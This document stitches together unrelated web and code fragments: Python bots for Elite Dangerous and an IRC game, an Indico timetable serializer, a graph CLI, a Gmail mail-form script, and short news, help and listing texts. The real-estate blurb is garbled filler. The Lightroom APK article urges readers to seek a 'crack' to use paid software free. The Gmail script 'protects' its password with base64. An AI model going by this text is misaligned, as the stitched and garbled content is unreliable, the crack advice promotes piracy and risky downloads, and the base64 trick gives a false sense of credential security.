systems = []
async for (system_id, name) in db.cursor(system_select, faction_id):
system_count = system_count + 1
systems.append(name)
self.faction_data[faction_id].systems = system_count
# progress field
embed.add_field(name="Tour progress", value="0/{} - 0%".format(system_count), inline=False)
# missing stations
if len(systems) > 0:
missing_systems = ", ".join(systems)
else:
missing_systems = "Tour completed"
embed.add_field(name="Missing systems", value="{}".format(missing_systems), inline=False)
# states
embed.add_field(name="Active states", value="None", inline=False)
embed.add_field(name="Pending states", value="None")
embed.add_field(name="Recovering states", value="None")
# expansion warning
embed.add_field(name="Expansion warning", value="None")
# low inf warning
embed.add_field(name="Inf getting low", value="None")
# conflict warning
embed.add_field(name="Inf too low", value="None")
# Not controll system warning
embed.add_field(name="Not in control", value="None")
await database.Database.close_connection(db)
message = await channel.send(embed=embed)
# await message.pin()
return message.id
async def recheck_systems(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "SELECT id as system_id, our_faction_id FROM star_system WHERE our_faction_id > 0"
async for (system_id, our_faction_id) in db.cursor(system_select):
system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': system_id}, 'object')
present = False
for system in system_data.docs:
for faction in system.minor_faction_presences:
if faction.minor_faction_id == our_faction_id:
present = True
if not present:
remove_query = "DELETE FROM star_system WHERE id = $1"
await db.execute(remove_query, system_id)
await database.Database.close_connection(db)
async def init_bgs(self):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
tick_id, time = await db.fetchrow(tick_select)
self.tick_id = tick_id
self.last_tick = time
messages_select = "SELECT id as faction_id, message_id FROM faction where id in (74847, 23831, 75253)"
async for (faction_id, message_id) in db.cursor(messages_select):
system_select = "select count(*) as system_count from star_system where our_faction_id = $1"
async for record in db.cursor(system_select, faction_id):
self.faction_data[faction_id].systems = record['system_count']
self.faction_data[faction_id].message = message_id
states_select = "select star_system.name, influence.system, influence.influence, influence.states, pending, recovering from influence join star_system on star_system.id = influence.system where tick = $1 and faction = $2"
async for (name, system_id, influence, states, pending, recovering) in db.cursor(states_select, *(tick_id, faction_id)):
self.updated_systems.add(name)
self.faction_data[faction_id].set_active(states)
self.faction_data[faction_id].set_pending(pending)
self.faction_data[faction_id].set_recovering(recovering)
influence_select = "select faction, influence.influence from influence where influence.system = $1 and tick = $2 order by influence desc limit 2"
their_influence = 0
async for (inf_faction_id, faction_influence) in db.cursor(influence_select, *(system_id, tick_id)):
if not inf_faction_id == faction_id:
if faction_influence > their_influence:
their_influence = faction_influence
if influence > 65.00:
self.faction_data[faction_id].expansion_warning.append("{} {}%".format(name, round(influence, 2)))
else:
difference = influence - their_influence
if 10.00 < difference <= 20.00:
self.faction_data[faction_id].mild_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference < 0.00:
self.faction_data[faction_id].not_control.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
elif difference <= 10.00:
self.faction_data[faction_id].high_warning.append(
"{} {}% ({})".format(name, round(influence, 2), round(difference, 2)))
await self.update_message(faction_id)
await database.Database.close_connection(db)
async def update_message(self, faction_id, conflict_data=None):
faction = self.faction_data[faction_id]
channel = self.bot.get_channel(BGS_CHANNEL)
message = await channel.fetch_message(faction.message)
embed = message.embeds[0]
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select star_system.id as system_id, name from star_system" \
" left join influence on star_system.id = influence.system and tick = $1 " \
"where our_faction_id = $2 and influence.influence is null order by name;"
missing_count = 0
missing_systems = []
async for (system_id, name) in db.cursor(system_select, *(self.tick_id, faction_id)):
missing_count = missing_count + 1
missing_systems.append(name)
done_count = faction.systems - missing_count
percentage = 100 * done_count / faction.systems
embed.set_field_at(0, name="Tour progress", value="{}/{} - {}%".format(done_count, faction.systems, round(percentage)), inline=False)
if len(missing_systems) > 0:
systems = ", ".join(missing_systems)
else:
systems = "Tour completed"
embed.set_field_at(1, name="Missing systems", value="{}".format(systems), inline=False)
embed.set_field_at(2, name="Active states", value="{}".format(faction.active), inline=False)
embed.set_field_at(3, name="Pending states", value="{}".format(faction.pending))
embed.set_field_at(4, name="Recovering states", value="{}".format(faction.recovering))
if len(faction.expansion_warning) > 0:
expansion_warning = "\n".join(faction.expansion_warning)
else:
expansion_warning = "None"
if len(faction.mild_warning) > 0:
mild_warning = "\n".join(faction.mild_warning)
else:
mild_warning = "None"
if len(faction.high_warning) > 0:
high_warning = "\n".join(faction.high_warning)
else:
high_warning = "None"
if len(faction.not_control) > 0:
not_control = "\n".join(faction.not_control)
else:
not_control = "None"
embed.set_field_at(5, name="Expansion warning", value="{}".format(expansion_warning))
embed.set_field_at(6, name="Inf getting low", value="{}".format(mild_warning))
embed.set_field_at(7, name="Inf too low", value="{}".format(high_warning))
embed.set_field_at(8, name="Not in control", value="{}".format(not_control))
if conflict_data is not None:
name, value = conflict_data
embed.add_field(name=name, value=value)
await message.edit(embed=embed)
await database.Database.close_connection(db)
async def submit(self, data):
db = await database.Database.get_connection(self.bot.loop)
influences = []
our_influence = 0
our_id = 0
skip = False
conflict_data = None
async with db.transaction():
timestamp = isoparse(data.timestamp)
# if timestamp > self.last_tick and data.StarSystem not in self.updated_systems:
if timestamp > self.last_tick:
if data.StarSystem not in self.updated_systems:
self.updated_systems.add(data.StarSystem)
system_id = await self._get_system_id(data.StarSystem)
for faction in data.Factions:
faction_id = await self._get_faction_id(faction.Name)
states = ""
pending = ""
recovering = ""
try:
for state in faction.ActiveStates:
if len(states) > 0:
states = states + '|'
states = states + state.State
except AttributeError as e:
states = faction.FactionState
try:
for state in faction.RecoveringStates:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.State
except AttributeError as e:
recovering = ''
try:
for state in faction.PendingStates:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.State
except AttributeError as e:
pending = ''
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction_id,
system_id,
faction.Influence * 100,
self.tick_id,
states,
pending,
recovering
)
if faction_id in (75253, 23831, 74847):
our_faction = self.faction_data[faction_id]
our_influence = faction.Influence * 100
our_id = faction_id
our_faction.set_recovering(recovering)
our_faction.set_active(states)
our_faction.set_pending(pending)
influences.append(faction.Influence * 100)
await db.execute(insert_influence, *influence_values)
update_system = "UPDATE star_system SET our_faction_id = $1 WHERE id = $2"
await db.execute(update_system, *(our_id, system_id))
try:
for conflict in data.Conflicts:
faction1 = await self._get_faction_id(conflict.Faction1.Name)
faction2 = await self._get_faction_id(conflict.Faction2.Name)
if faction1 in (75253, 23831, 74847) or faction2 in (75253, 23831, 74847):
war_type = conflict.WarType.capitalize()
score1 = conflict.Faction1.WonDays
score2 = conflict.Faction2.WonDays
if war_type is "Civilwar":
war_type = "Civil war"
if data.StarSystem not in self.war_cache or self.war_cache[data.StarSystem] != score1 + score2:
self.war_cache[data.StarSystem] = score1 + score2
if faction1 in (75253, 23831, 74847):
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score1, score2))
else:
conflict_data = ("{} in {}".format(war_type, data.StarSystem), "{} - {}".format(score2, score1))
except AttributeError as e:
conflict_data = None
else:
skip = True
if not skip:
print(data.StarSystem + " recorded")
influences.sort(reverse=True)
if data.StarSystem in self.updated_systems:
for item in our_faction.expansion_warning:
if data.StarSystem in item:
our_faction.expansion_warning.remove(item)
for item in our_faction.mild_warning:
if data.StarSystem in item:
our_faction.mild_warning.remove(item)
for item in our_faction.not_control:
if data.StarSystem in item:
our_faction.not_control.remove(item)
for item in our_faction.high_warning:
if data.StarSystem in item:
our_faction.high_warning.remove(item)
if our_influence > 65.00:
our_faction.expansion_warning.append("{} {}%".format(data.StarSystem, round(our_influence, 2)))
else:
if our_influence == influences[0]:
difference = our_influence - influences[1]
else:
difference = our_influence - influences[0]
if 10.00 < difference <= 20.00:
our_faction.mild_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference < 0.00:
our_faction.not_control.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
elif difference <= 10.00:
our_faction.high_warning.append(
"{} {}% ({})".format(data.StarSystem, round(our_influence, 2), round(difference, 2)))
await self.update_message(our_id, conflict_data)
await database.Database.close_connection(db)
def setup(bot):
bot.add_cog(BGS(bot))
|
New figures from the Home Office show that 1,293 house fires were started by a household appliance in the area between April 2012 and March last year.
More than half the incidents attended by the West Sussex Fire and Rescue Service were started by cookers, with 767 fires causing 147 deaths or casualties over the five-year period.
Between April 2012 and March 2017, 247 fires started by domestic appliances caused deaths or injuries.
Over 110 fires were started by faulty appliances or leads in West Sussex over the five years. Across England, such faults started over 13,000 fires.
The most common reason for fires started by appliances was misuse of the equipment, which caused 863 fires in West Sussex, and nearly 48,000 nationally.
But the old staple of fire safety talks, chip pans, were still the cause of 132 fires in West Sussex, and over 9,000 fires nationally. |
"""
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
# Nothing hardcoded found here.
# qebab, 24/6/08.
import re
from munin import loadable
class xp(loadable.loadable):
def __init__(self, cursor):
super().__init__(cursor, 1)
self.paramre = re.compile(
r"^\s*(\d+)[.-:\s](\d+)[.-:\s](\d+)(?:\s+(\d+)[.-:\s](\d+)[.-:\s](\d+))?(?:\s+(\d+))?"
)
self.usage = (
self.__class__.__name__ + " <defender coords> [attacker coords] [MCs]"
)
def execute(self, user, access, irc_msg):
m = self.paramre.search(irc_msg.command_parameters)
if not m:
irc_msg.reply("Usage: %s" % (self.usage,))
return 0
if access < self.level:
irc_msg.reply("You do not have enough access to use this command")
return 0
victim = None
attacker = None
mcs = 0
victim = loadable.planet(x=m.group(1), y=m.group(2), z=m.group(3))
if not victim.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet" % (victim.x, victim.y, victim.z)
)
return 1
if not victim:
irc_msg.reply("Usage: %s" % (self.usage,))
return 1
if m.lastindex >= 6 and m.group(4) and m.group(5) and m.group(6):
attacker = loadable.planet(x=m.group(4), y=m.group(5), z=m.group(6))
if not attacker.load_most_recent(self.cursor, irc_msg.round):
irc_msg.reply(
"%s:%s:%s is not a valid planet"
% (attacker.x, attacker.y, attacker.z)
)
return 1
if not attacker:
u = loadable.user(pnick=irc_msg.user)
u.load_from_db(self.cursor, irc_msg.round)
if not u.planet:
irc_msg.reply(
"You must be registered to use the automatic %s command (log in with P and "
"set mode +x, then make sure your planet is set with the pref command (!pref planet=x:y:z))"
% (self.__class__.__name__)
)
return 1
attacker = u.planet
if m.lastindex == 7:
mcs = int(m.group(7))
reply = "Target %s:%s:%s (%s|%s) " % (
victim.x,
victim.y,
victim.z,
self.format_real_value(victim.value),
self.format_real_value(victim.score),
)
reply += "| Attacker %s:%s:%s (%s|%s) " % (
attacker.x,
attacker.y,
attacker.z,
self.format_real_value(attacker.value),
self.format_real_value(attacker.score),
)
bravery = attacker.bravery(victim)
cap = int(attacker.cap_rate(victim) * victim.size)
min_xp, max_xp = attacker.calc_xp(victim, mcs)
min_score = self.format_real_value(60 * min_xp)
max_score = self.format_real_value(60 * max_xp)
reply += "| Bravery: %.2f | Cap: %d | MCs: %d | XP: %d-%d | Score: %s-%s" % (
bravery,
cap,
mcs,
min_xp,
max_xp,
min_score,
max_score
)
irc_msg.reply(reply)
return 1
|
EU - The European Commission welcomes the European Parliaments Approval of a draft Directive will simplify and facilitate the administrative procedures for ships entering and leaving European ports.
The provisions of the Directive will be phased in between 2012 and 2015. This Directive will contribute to making maritime transport more attractive and supporting maritime activity, particularly in small and medium-sized commercial ports.
Siim Kallas, Commission Vice-President responsible for transport said: The simplification of administrative procedures for maritime transport is an important step, not only because it will reduce the costs of maritime transport, which is used to deliver almost 40 per cent of goods within the Internal Market, but also because maritime transport is a cleaner and safer form of transport".
This agreement gives the Member States, industries and port authorities five years to set up a one-stop administrative shop in every port. From 2013, the Directive will also simplify and harmonise a certain number of procedures, notably reducing the repeated transmission of data to the different administrative authorities in the ports.
While the administrative formalities for other modes of transport have been considerably streamlined since the creation of the single market, maritime transport remains subject to complex procedures. Under customs regulations and international law, a ship is considered to leave a Member States territory once it crosses the territorial water limit of 12 nautical miles (22 km). A vessel sailing from one European Union port to another has to go through administrative formalities on both departure and arrival in the same way as international shipping.
After the adoption of guidelines for veterinary checks in December 2009 and the amendment of the implementing rules for the Customs Code in March 2010, the Directive adopted today completes the first instalment of short-term actions planned as part of the European maritime transport area without borders initiative launched in 2009.
It is also a new step towards establishing a framework that will allow a more integrated management of the flow of administrative and commercial information accompanying the movement of goods into, out of and within the European Union, which will facilitate the work of both the operators and the inspection authorities. In the area of maritime transport, this framework will be completed by the European e-Maritime initiative, which the Commission is working on in cooperation with the stakeholders and which will be the subject of a proposal in 2011. |
# This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from collections import defaultdict
from hashlib import md5
from itertools import chain
from flask import has_request_context, session
from sqlalchemy.orm import defaultload
from indico.modules.events.contributions.models.persons import AuthorType
from indico.modules.events.models.events import EventType
from indico.modules.events.timetable.models.entries import TimetableEntry, TimetableEntryType
from indico.util.date_time import iterdays
from indico.web.flask.util import url_for
class TimetableSerializer(object):
def __init__(self, event, management=False, user=None):
self.management = management
self.user = user if user is not None or not has_request_context() else session.user
self.event = event
self.can_manage_event = self.event.can_manage(self.user)
def serialize_timetable(self, days=None, hide_weekends=False, strip_empty_days=False):
tzinfo = self.event.tzinfo if self.management else self.event.display_tzinfo
self.event.preload_all_acl_entries()
timetable = {}
for day in iterdays(self.event.start_dt.astimezone(tzinfo), self.event.end_dt.astimezone(tzinfo),
skip_weekends=hide_weekends, day_whitelist=days):
date_str = day.strftime('%Y%m%d')
timetable[date_str] = {}
contributions_strategy = defaultload('contribution')
contributions_strategy.subqueryload('person_links')
contributions_strategy.subqueryload('references')
query_options = (contributions_strategy,
defaultload('session_block').subqueryload('person_links'))
query = (TimetableEntry.query.with_parent(self.event)
.options(*query_options)
.order_by(TimetableEntry.type != TimetableEntryType.SESSION_BLOCK))
for entry in query:
day = entry.start_dt.astimezone(tzinfo).date()
date_str = day.strftime('%Y%m%d')
if date_str not in timetable:
continue
if not entry.can_view(self.user):
continue
data = self.serialize_timetable_entry(entry, load_children=False)
key = self._get_entry_key(entry)
if entry.parent:
parent_code = 's{}'.format(entry.parent_id)
timetable[date_str][parent_code]['entries'][key] = data
else:
if (entry.type == TimetableEntryType.SESSION_BLOCK and
entry.start_dt.astimezone(tzinfo).date() != entry.end_dt.astimezone(tzinfo).date()):
# If a session block lasts into another day we need to add it to that day, too
timetable[entry.end_dt.astimezone(tzinfo).date().strftime('%Y%m%d')][key] = data
timetable[date_str][key] = data
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
def serialize_session_timetable(self, session_, without_blocks=False, strip_empty_days=False):
event_tz = self.event.tzinfo
timetable = {}
if session_.blocks:
start_dt = min(chain((b.start_dt for b in session_.blocks), (self.event.start_dt,))).astimezone(event_tz)
end_dt = max(chain((b.end_dt for b in session_.blocks), (self.event.end_dt,))).astimezone(event_tz)
else:
start_dt = self.event.start_dt_local
end_dt = self.event.end_dt_local
for day in iterdays(start_dt, end_dt):
timetable[day.strftime('%Y%m%d')] = {}
for block in session_.blocks:
block_entry = block.timetable_entry
if not block_entry:
continue
date_key = block_entry.start_dt.astimezone(event_tz).strftime('%Y%m%d')
entries = block_entry.children if without_blocks else [block_entry]
for entry in entries:
if not entry.can_view(self.user):
continue
entry_key = self._get_entry_key(entry)
timetable[date_key][entry_key] = self.serialize_timetable_entry(entry, load_children=True)
if strip_empty_days:
timetable = self._strip_empty_days(timetable)
return timetable
@staticmethod
def _strip_empty_days(timetable):
"""Return the timetable without the leading and trailing empty days."""
days = sorted(timetable)
first_non_empty = next((day for day in days if timetable[day]), None)
if first_non_empty is None:
return {}
last_non_empty = next((day for day in reversed(days) if timetable[day]), first_non_empty)
return {day: timetable[day] for day in days if first_non_empty <= day <= last_non_empty}
def serialize_timetable_entry(self, entry, **kwargs):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return self.serialize_session_block_entry(entry, kwargs.pop('load_children', True))
elif entry.type == TimetableEntryType.CONTRIBUTION:
return self.serialize_contribution_entry(entry)
elif entry.type == TimetableEntryType.BREAK:
return self.serialize_break_entry(entry)
else:
raise TypeError("Unknown timetable entry type.")
def serialize_session_block_entry(self, entry, load_children=True):
block = entry.session_block
data = {}
if not load_children:
entries = defaultdict(dict)
else:
entries = {self._get_entry_key(x): self.serialize_timetable_entry(x) for x in entry.children}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(block.session))
data.update(self._get_location_data(block))
data.update({'entryType': 'Session',
'sessionSlotId': block.id,
'sessionId': block.session_id,
'sessionCode': block.session.code,
'title': block.session.title,
'slotTitle': block.title,
'attachments': self._get_attachment_data(block.session),
'code': block.session.code,
'contribDuration': block.session.default_contribution_duration.seconds / 60,
'conveners': [self._get_person_data(x) for x in block.person_links],
'description': block.session.description,
'duration': block.duration.seconds / 60,
'isPoster': block.session.is_poster,
'entries': entries,
'pdf': url_for('sessions.export_session_timetable', block.session),
'url': url_for('sessions.display_session', block.session),
'friendlyId': block.session.friendly_id})
return data
def serialize_contribution_entry(self, entry):
from indico.modules.events.api import SerializerBase
block = entry.parent.session_block if entry.parent else None
contribution = entry.contribution
data = {}
data.update(self._get_entry_data(entry))
if contribution.session:
data.update(self._get_color_data(contribution.session))
data.update(self._get_location_data(contribution))
data.update({'entryType': 'Contribution',
'_type': 'ContribSchEntry',
'_fossil': 'contribSchEntryDisplay',
'contributionId': contribution.id,
'attachments': self._get_attachment_data(contribution),
'description': contribution.description,
'duration': contribution.duration.seconds / 60,
'pdf': url_for('contributions.export_pdf', entry.contribution),
'presenters': map(self._get_person_data,
sorted([p for p in contribution.person_links if p.is_speaker],
key=lambda x: (x.author_type != AuthorType.primary,
x.author_type != AuthorType.secondary,
x.display_order_key))),
'sessionCode': block.session.code if block else None,
'sessionId': block.session_id if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': contribution.title,
'url': url_for('contributions.display_contribution', contribution),
'friendlyId': contribution.friendly_id,
'references': map(SerializerBase.serialize_reference, contribution.references),
'board_number': contribution.board_number})
return data
def serialize_break_entry(self, entry, management=False):
block = entry.parent.session_block if entry.parent else None
break_ = entry.break_
data = {}
data.update(self._get_entry_data(entry))
data.update(self._get_color_data(break_))
data.update(self._get_location_data(break_))
data.update({'entryType': 'Break',
'_type': 'BreakTimeSchEntry',
'_fossil': 'breakTimeSchEntry',
'description': break_.description,
'duration': break_.duration.seconds / 60,
'sessionId': block.session_id if block else None,
'sessionCode': block.session.code if block else None,
'sessionSlotId': block.id if block else None,
'sessionSlotEntryId': entry.parent.id if entry.parent else None,
'title': break_.title})
return data
def _get_attachment_data(self, obj):
def serialize_attachment(attachment):
return {'id': attachment.id,
'_type': 'Attachment',
'_fossil': 'attachment',
'title': attachment.title,
'download_url': attachment.download_url}
def serialize_folder(folder):
return {'id': folder.id,
'_type': 'AttachmentFolder',
'_fossil': 'folder',
'title': folder.title,
'attachments': map(serialize_attachment, folder.attachments)}
data = {'files': [], 'folders': []}
items = obj.attached_items
data['files'] = map(serialize_attachment, items.get('files', []))
data['folders'] = map(serialize_folder, items.get('folders', []))
if not data['files'] and not data['folders']:
data['files'] = None
return data
def _get_color_data(self, obj):
return {'color': '#' + obj.background_color,
'textColor': '#' + obj.text_color}
def _get_date_data(self, entry):
if self.management:
tzinfo = entry.event.tzinfo
else:
tzinfo = entry.event.display_tzinfo
return {'startDate': self._get_entry_date_dt(entry.start_dt, tzinfo),
'endDate': self._get_entry_date_dt(entry.end_dt, tzinfo)}
def _get_entry_data(self, entry):
from indico.modules.events.timetable.operations import can_swap_entry
data = {}
data.update(self._get_date_data(entry))
data['id'] = self._get_entry_key(entry)
data['uniqueId'] = data['id']
data['conferenceId'] = entry.event_id
if self.management:
data['isParallel'] = entry.is_parallel()
data['isParallelInSession'] = entry.is_parallel(in_session=True)
data['scheduleEntryId'] = entry.id
data['canSwapUp'] = can_swap_entry(entry, direction='up')
data['canSwapDown'] = can_swap_entry(entry, direction='down')
return data
def _get_entry_key(self, entry):
if entry.type == TimetableEntryType.SESSION_BLOCK:
return 's{}'.format(entry.id)
elif entry.type == TimetableEntryType.CONTRIBUTION:
return 'c{}'.format(entry.id)
elif entry.type == TimetableEntryType.BREAK:
return 'b{}'.format(entry.id)
else:
raise ValueError()
def _get_entry_date_dt(self, dt, tzinfo):
return {'date': dt.astimezone(tzinfo).strftime('%Y-%m-%d'),
'time': dt.astimezone(tzinfo).strftime('%H:%M:%S'),
'tz': str(tzinfo)}
def _get_location_data(self, obj):
data = {}
data['location'] = obj.venue_name
data['room'] = obj.room_name
data['inheritLoc'] = obj.inherit_location
data['inheritRoom'] = obj.inherit_location
if self.management:
data['address'] = obj.address
return data
def _get_person_data(self, person_link):
person = person_link.person
data = {'firstName': person_link.first_name,
'familyName': person_link.last_name,
'affiliation': person_link.affiliation,
'emailHash': md5(person.email.encode('utf-8')).hexdigest() if person.email else None,
'name': person_link.get_full_name(last_name_first=False, last_name_upper=False,
abbrev_first_name=False, show_title=True),
'displayOrderKey': person_link.display_order_key}
if self.can_manage_event:
data['email'] = person.email
return data
def serialize_contribution(contribution):
return {'id': contribution.id,
'friendly_id': contribution.friendly_id,
'title': contribution.title}
def serialize_day_update(event, day, block=None, session_=None):
serializer = TimetableSerializer(event, management=True)
timetable = serializer.serialize_session_timetable(session_) if session_ else serializer.serialize_timetable()
block_id = serializer._get_entry_key(block) if block else None
day = day.strftime('%Y%m%d')
return {'day': day,
'entries': timetable[day] if not block else timetable[day][block_id]['entries'],
'slotEntry': serializer.serialize_session_block_entry(block) if block else None}
def serialize_entry_update(entry, session_=None):
serializer = TimetableSerializer(entry.event, management=True)
day = entry.start_dt.astimezone(entry.event.tzinfo)
day_update = serialize_day_update(entry.event, day, block=entry.parent, session_=session_)
return dict({'id': serializer._get_entry_key(entry),
'entry': serializer.serialize_timetable_entry(entry),
'autoOps': None},
**day_update)
def serialize_event_info(event):
return {'_type': 'Conference',
'id': unicode(event.id),
'title': event.title,
'startDate': event.start_dt_local,
'endDate': event.end_dt_local,
'isConference': event.type_ == EventType.conference,
'sessions': {sess.id: serialize_session(sess) for sess in event.sessions}}
def serialize_session(sess):
"""Return data for a single session"""
data = {
'_type': 'Session',
'address': sess.address,
'color': '#' + sess.colors.background,
'description': sess.description,
'id': sess.id,
'isPoster': sess.is_poster,
'location': sess.venue_name,
'room': sess.room_name,
'roomFullname': sess.room_name,
'textColor': '#' + sess.colors.text,
'title': sess.title,
'url': url_for('sessions.display_session', sess)
}
return data
|
Looking for a new home in North East Park Hill? It is a great time to buy real estate in North East Park Hill and our site is a great place to begin your search. You can check out North East Park Hill schools, market statistics, the latest listings and more. Whether you are a first-time home buyer or you are already familiar with the home buying process, you can be assured that you have the best tools and the perfect agent available to help with your North East Park Hill home search.
There are currently 1 incomes for sale in North East Park Hill. The average price for North East Park Hill properties is $445,000which is 48% lower than all incomes within a 20 mile radius. The highest priced property in North East Park Hill is $445,000 while the lowest priced income is listed at $445,000. Most of the properties available in North East Park Hill are incomes . Compared to last month, the average price of real estate in the area has gone up 100%. |
# -*- coding: utf-8 -*-
"""Main program for Command Line interface
Usage:
graph_algo -h
graph_algo --version
graph_algo p1hw4 [-v] -i <file>
graph_algo p2hw4 [--argo <argo>] [-v] -i <file>...
graph_algo p2hw6 [-v] -i <file>...
Options:
-h --help show this help message and exit
--version show version and exit
-v --verbose print status messages
-i, --input <file>... input file(s)
--argo <algo> choose one algorithm
"""
from __future__ import unicode_literals, print_function
from docopt import docopt
from .graph import Graph
__version__ = "0.1.0"
__author__ = "Adason"
__license__ = "MIT"
def main():
"""Main entry point for the graph_algo CLI.
"""
args = docopt(__doc__, version=__version__)
# print(args)
if args["p1hw4"]:
g = Graph.read_input_part1_hw4(args["--input"][0])
sizes = []
for scc in g.kosaraju_sccs():
sizes.append(len(scc))
print(sorted(sizes, reverse=True))
elif args["p2hw4"]:
min_dists = []
for fn in args["--input"]:
g = Graph.read_input_part2_hw4(fn)
dist_pairs = g.floyd_warshall_apsp()
if dist_pairs:
min_dists.extend(dist_pairs.values())
if len(min_dists) > 0:
print(min(min_dists))
else:
print("NULL")
elif args["p2hw6"]:
for fn in args["--input"]:
g = Graph.read_input_part2_hw6(fn)
sol_status = 1
for scc in g.kosaraju_sccs():
scc_vids = set(scc)
for vid in scc:
if str(-int(vid)) in scc_vids:
sol_status = 0
break
if sol_status == 0:
break
print(sol_status, end="")
|
To prevent the web version of DirectPass from saving passwords for specific websites, it includes only the Password Exception list.
Click Add to open the Add or Edit an Item window.
Type or paste the address of the website you want to add to the exception list.
Click the pencil icon in the right-most column of the website you want to modify.
Adjust the settings you want to change.
Mark the checkbox of the website you want to delete.
Click Remove to delete the website. |
#!/usr/bin/python
# mail form program using gmail
import base64
import smtplib
from email.mime.text import MIMEText
# change smtpuser, zap
# recipients I use similar to carbon copy
# REPLY_TO_ADDRESS is the user filling out the form
def gmail(REPLY_TO_ADDRESS,data,subject):
smtpserver = 'smtp.gmail.com' # gmail smtp
smtpuser = '[email protected]' # gmail user account
zap='' # enter encoded password
str(zap)
smtppass=base64.b64decode(zap)
RECIPIENTS = ["'blah' <[email protected]>"]
msg = MIMEText(data)
msg['Subject'] = subject
msg.add_header('reply-to', REPLY_TO_ADDRESS)
mailServer = smtplib.SMTP('smtp.gmail.com',587) # 587
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(smtpuser, smtppass)
mailServer.sendmail(smtpuser,RECIPIENTS,msg.as_string())
mailServer.close()
if __name__=="__main__":
REPLY_TO_ADDRESS='[email protected]'
data="any message"
subject="whatever"
gmail(REPLY_TO_ADDRESS,data,subject)
|
Download Adobe Photoshop Lightroom CC APK v 3.5.1 for Android Cell Phones and it gives you simple solution for capturing, editing and sharing your photos.
Good pictures are something that all of us want because uploading such beautiful and artistic pictures have become such a trend and all of that is possible with the help of a good camera and the photo editing. A good picture can take you back in time with worth remembering memories. Even from a normal camera, you can get some really great clicks and then you can edit them but for that, you will have to have the best editing skills or a really good photo editor. The good editing skills can be improved with the continuous practicing and giving a detail thought to it while on the other hand to get some good photo editor you need to search on the internet and read about them. Adobe is no news to us when we talk about e photo editors and there are a lot of the adobe photo editors that you can use and one of them is the Adobe Photoshop Lightroom. There is a lot of other ones too but the Adobe Photoshop Lightroom is what you need to know about at the very start and if you want all the basics editing then it is the best choice for you and you must consider downloading it and that is why this Adobe Photoshop Lightroom Review is necessary.
Adobe is one of the most popular names when it comes to the photo editors and it is a name that job one can deny knowing. Well, Adobe Photoshop Lightroom is for all the basic editing like making the collages of your pictures so you can combine all your precious moments in one picture and then there are also some basic editing like removing the red-eye from your pictures or enhancing the digital pictures of yours. Adding little hues, sharpening the pictures, reducing the noise from the videos and converting them to the black and white is all that the Adobe photoshop lightroom is best at doing. Moreover, the Adobe Photoshop Lightroom also have the library and it allows the slideshow of the pictures. You can create the photo books using this software and can also print the images directly after editing them. If you want to download it too then you would be delighted to know that you can get the Adobe Photoshop Lightroom CC APK download.
The APK file of the Adobe Photoshop Lightroom is very easy to download it and you can get the Adobe Photoshop Lightroom Download APK from a number of different websites that offers you the APK files of such software. You can get these files for free and for that purpose you will have to look for the Adobe Photoshop Lightroom APK download crack which means you won’t have to pay for it and can utilize its services completely for free. So this was all you needed to know about the Adobe Photoshop Lightroom and how and where can you download it for free. |
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import types and tell flake8 to ignore the "unused" List.
from typing import Any, Dict, Optional, Tuple
from typing_extensions import Final
from ._extension import Extension
_PLATFORM_SNAP = dict(core18="gnome-3-34-1804")
class ExtensionImpl(Extension):
"""Drives ROS 2 build and runtime environment for snap."""
ROS_DISTRO: Final[str] = "foxy"
@staticmethod
def get_supported_bases() -> Tuple[str, ...]:
return ("core20",)
